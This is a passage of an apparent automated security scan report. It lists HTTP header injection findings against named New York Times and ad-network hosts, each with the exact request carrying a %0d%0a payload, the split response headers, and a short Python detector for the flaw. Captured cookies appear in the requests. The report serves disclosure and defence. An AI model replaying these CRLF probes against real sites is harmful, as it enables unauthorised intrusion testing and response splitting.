2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.nytco.com
Path:   /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 7fc66%0d%0a8dd5b3d6a61 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/EMPLOYEE/7fc66%0d%0a8dd5b3d6a61/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:01 GMT
Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/7fc66
8dd5b3d6a61
/c/HRS_HRAM.HRS_CE.GBL?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJzJTQg31ZypJwG88s70yLh2LJnTcg!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=pv96knwIQLv8M6q+0wxVNoOH8UELVDAjmi5lOFUVLvLHLUcMZEE4VI+/2ppEGLojoOblLO2MXE0zbBLPh4G9gikNQpZ1CNnvWvuuqEYaNeD+zsteWFi355m2PmuxZ9pj++X8MGRqkm2QgXCsJaP58kYmNVL+5vSy; path=/
Content-Length: 373

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.nytco.com
Path:   /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 122a5%0d%0af997558f359 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/EMPLOYEE/HRMS/122a5%0d%0af997558f359/HRS_HRAM.HRS_CE.GBL HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:01 GMT
Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/122a5
f997558f359
/HRS_HRAM.HRS_CE.GBL?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJFm1qTLtKy2GrV8L5Ldmky3htJyGD!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=6zUc1Hr+hS8fzguR93ZUHsyJw2D+pTonngW4GKmuJP1Uu6XCofTPdoPRiY6t6ilNZb3U41AiOXsvgiZZ4b7ONkeraFa7TgACwmKFYbx6fq6Xn6F1I/aTFXpFXDJSkH7qUlFP9FTkvXZKz6nzhK0SmMV8P2IqxLgs; path=/
Content-Length: 379

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.nytco.com
Path:   /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload bda3d%0d%0a16b48f1ff0c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/EMPLOYEE/HRMS/c/bda3d%0d%0a16b48f1ff0c HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:01 GMT
Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/bda3d
16b48f1ff0c
?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJR4BQYkGJqp5ZL2X8GZGbXcMSf98p!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=7t0h06Q/IRWLHue1c9MOGG3EKVj3snl0QIoYoY3JzcLvmvO9K8XlUvIN6Y8k7AxfIBUNxUC3514n2pcAQA2hW+2E3lO6ayKzaN3t3KdXF+99ca85Af21gWJmvWwcZWSQIk43wSRWOFf+SzvaJVxjU/d5Uq6c9VPt; path=/
Content-Length: 343

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies2.nytimes.com
Path:   /gst/movies/movie.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a35a%0d%0a19b04d91325 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a35a%0d%0a19b04d91325/movies/movie.html?v_id=451514 HTTP/1.1
Host: movies2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:15 GMT
Content-length: 0
Content-type: text/html
Location: http://movies.nytimes.com/pages/movies/index.html/7a35a
19b04d91325
/movies/movie.html?v_id=451514


2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies2.nytimes.com
Path:   /gst/movies/movie.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5a82d%0d%0adf25b0b4f75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /gst/5a82d%0d%0adf25b0b4f75/movie.html?v_id=451514 HTTP/1.1
Host: movies2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:05 GMT
Content-length: 0
Content-type: text/html
Location: http://movies.nytimes.com/pages/movies/index.html/gst/5a82d
df25b0b4f75
/movie.html?v_id=451514


2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies2.nytimes.com
Path:   /gst/movies/movie.html

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e822f%0d%0a652f2e24a5a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /gst/movies/e822f%0d%0a652f2e24a5a?v_id=451514 HTTP/1.1
Host: movies2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:10 GMT
Content-length: 0
Content-type: text/html
Location: http://movies.nytimes.com/pages/movies/index.html/gst/movies/e822f
652f2e24a5a
?v_id=451514


2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw

Issue detail

The value of the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq request parameter is copied into the location response header. The payload 52713%0d%0a256b90df09e was submitted in the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header. Note that the same value is also copied into the first Set-Cookie header of the response, but there it stays percent-encoded (%0d%0a), so only the location header is split; a percent-encoded copy of the payload is a reflection, not an injection.

Request

GET /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=52713%0d%0a256b90df09e&247cr=4059381386 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:06:42 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Sat, 13 Nov 2010 02:06:42 GMT
location: http://ad.vulnerable.ad.partner52713
256b90df09e

Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614002/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614002/ct%2c/0/http%3a%2f%2fad%2edoubleclick%2enet52713%0d%0a256b90df09e/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:42 GMT; path=/n/78471; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286422803672728651; expires=Sun, 13-Nov-2011 02:06:42 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286422803672729261; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload 493a9%0d%0a20f05077930 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header. Note that in this response the value supplies the host portion of the redirect target (location: http://493a9...), not merely a path segment as in the other Location-header findings.

Request

GET /n/78471/87266/493a9%0d%0a20f05077930/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp&247cr=4059381386 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:06:45 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Sat, 13 Nov 2010 02:06:45 GMT
location: http://493a9
20f05077930
/clk;222387429;46056971;q?http://r.clickforensics.com/2464/C029ED6A4E/www.helppreventhepatitis.com/help-protect-yourself/hepatitis-protection.html?rotation=46056971&banner=222387429&src=1&kw=p
Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614005/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614005/ct%2c/0/http%3a%2f%2f493a9%0d%0a20f05077930%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:45 GMT; path=/n/78471; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286422803941163528; expires=Sun, 13-Nov-2011 02:06:45 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286422803941163819; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nytimes.com
Path:   /ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f7dbb%0d%0aef896eaeb9a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f7dbb%0d%0aef896eaeb9a/membercenter/help/infoservdirectory.html HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:13 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/f7dbb
ef896eaeb9a
/membercenter/help/infoservdirectory.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nytimes.com
Path:   /ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c6f96%0d%0a63068f27cab was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ref/c6f96%0d%0a63068f27cab/help/infoservdirectory.html HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:00 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/ref/c6f96
63068f27cab
/help/infoservdirectory.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nytimes.com
Path:   /ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d8dfd%0d%0a52675aa17e1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ref/membercenter/d8dfd%0d%0a52675aa17e1/infoservdirectory.html HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:08:00 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/ref/membercenter/d8dfd
52675aa17e1
/infoservdirectory.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nytimes.com
Path:   /ref/membercenter/help/infoservdirectory.html

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ba656%0d%0ac1c6899a20 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /ref/membercenter/help/ba656%0d%0ac1c6899a20 HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:59 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/ref/membercenter/help/ba656
c1c6899a20

Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>
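
The check behind this finding, as an added example that is not part of the Hoyt LLC report and not the scanner's own code: it builds the probe path the way the report's "REST URL parameter N" numbering implies (the N-th slash-separated segment is replaced wholesale by the payload), then URL-decodes the payload and looks for its post-CRLF half at the start of a header line. SAMPLE_RESPONSE is a constructed, trimmed copy of the 2.23 response above with CRLF line endings restored, since the report shows only line breaks; the function and constant names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the 2.23 response above, trimmed, with the CRLF line
# endings the server actually emits restored (the report shows them as plain
# line breaks). The body is abbreviated.
SAMPLE_PAYLOAD = "ba656%0d%0ac1c6899a20"
SAMPLE_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: Sun-ONE-Web-Server/6.1\r\n"
    "Content-length: 122\r\n"
    "Content-type: text/html\r\n"
    "Location: http://www.nytimes.com/ref/membercenter/help/ba656\r\n"
    "c1c6899a20\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD></HTML>"
)


def probe_path(path: str, index: int, payload: str) -> str:
    """Build the probe request path the way the scanner does: 'REST URL
    parameter N' is the N-th slash-separated segment (1-based) and it is
    replaced wholesale by the payload; a trailing slash is kept."""
    segments = path.split("/")  # segments[0] is '' for a leading '/'
    if index < 1 or index >= len(segments) or segments[index] == "":
        raise ValueError(f"path {path!r} has no REST URL parameter {index}")
    segments[index] = payload
    return "/".join(segments)


def split_headers(raw: str):
    """Split a raw HTTP response into (status line, header lines, body).
    Accepts bare LF as well as CRLF so text copied out of a report parses too."""
    parts = re.split(r"\r?\n\r?\n", raw, maxsplit=1)
    head = parts[0]
    body = parts[1] if len(parts) > 1 else ""
    lines = re.split(r"\r?\n", head)
    return lines[0], lines[1:], body


def injected_header_lines(payload: str, raw_response: str) -> list:
    """Reproduce the scanner's verdict: URL-decode the probe, take everything
    after its first CR LF, and return each header line that starts with that
    text. Any hit is a line the client will parse as a header even though it
    came from the request path."""
    decoded = unquote(payload)
    if "\r\n" not in decoded:
        return []
    marker = decoded.split("\r\n", 1)[1]
    _, headers, _ = split_headers(raw_response)
    return [line for line in headers if line.startswith(marker)]


def malformed_header_lines(raw_response: str) -> list:
    """Header lines with no 'name: value' shape. A split Location header
    leaves its tail as such a line (c1c6899a20 above); a deliberate injection
    would instead supply a well-formed 'Name: value' there, so treat this as
    a corroborating signal, not as the detector."""
    _, headers, _ = split_headers(raw_response)
    return [line for line in headers if ":" not in line]


if __name__ == "__main__":
    print(probe_path("/ref/membercenter/help/infoservdirectory.html", 4, SAMPLE_PAYLOAD))
    print(injected_header_lines(SAMPLE_PAYLOAD, SAMPLE_RESPONSE))
    print(malformed_header_lines(SAMPLE_RESPONSE))
```

A response that percent-encodes the CR LF on the way out (Location ending in ba656%0D%0Ac1c6899a20) yields no hit, which is the behaviour a fixed server should show when the same probe is replayed.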

2.24. http://nytimes.com/rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nytimes.com
Path:   /rss

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7df2a%0d%0a5589811a206 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7df2a%0d%0a5589811a206 HTTP/1.1
Host: nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:07:11 GMT
Content-length: 122
Content-type: text/html
Location: http://www.nytimes.com/7df2a
5589811a206

Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel2519.everesttech.net
Path:   /2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click

Issue detail

The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 56e58%0d%0ad99abd59502 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header: in the response below the decoded CR LF splits the everest_cookie Set-Cookie header inside its ev_sid field, so d99abd59502 lands on a header line of its own. The same unencoded value is also reflected into the ev_sid query parameter of the Location header, which is split in the same way.

Request

GET /2519/rq/56e58%0d%0ad99abd59502/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1
Host: pixel2519.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:36:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=7KpM3fm0AwAAKus; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~7KpM3fm0AwAAKus; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~7KpM3fm0AwAAKus~ev_uid~2519~ev_sid~56e58
d99abd59502
~ev_clientid~c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229~ev_clickid~7KpM3fm0AwAAKus~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=56e58
d99abd59502&ev_clientid=c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229&url=http:/clickserve.dartsearch.net/link/click&ef_id=7KpM3fm0AwAAKus:20101113023636:s
Expires: Sat, 13 Nov 2010 02:36:36 GMT
Content-Length: 547
Keep-Alive: timeout=15, max=584
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_
...[SNIP]...

2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel2519.everesttech.net
Path:   /2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click

Issue detail

The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload b5412%0d%0acbbc9e6376e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header: here the split lands inside the ev_clientid field of everest_cookie, and the same unencoded value is reflected into the ev_clientid query parameter of the Location header.

Request

GET /2519/rq/3/b5412%0d%0acbbc9e6376e/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1
Host: pixel2519.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 02:36:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net
